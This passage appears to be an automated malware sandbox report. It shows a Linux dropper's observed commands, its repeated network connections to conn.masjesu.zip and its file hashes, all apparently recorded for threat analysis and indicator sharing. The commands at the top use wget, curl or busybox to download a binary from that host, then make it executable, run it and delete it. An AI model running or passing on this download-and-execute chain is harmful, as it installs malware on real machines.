[rm q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]
/bin/chmod
[chmod 777 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]
/tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM
[./eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]
/bin/rm
[rm eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |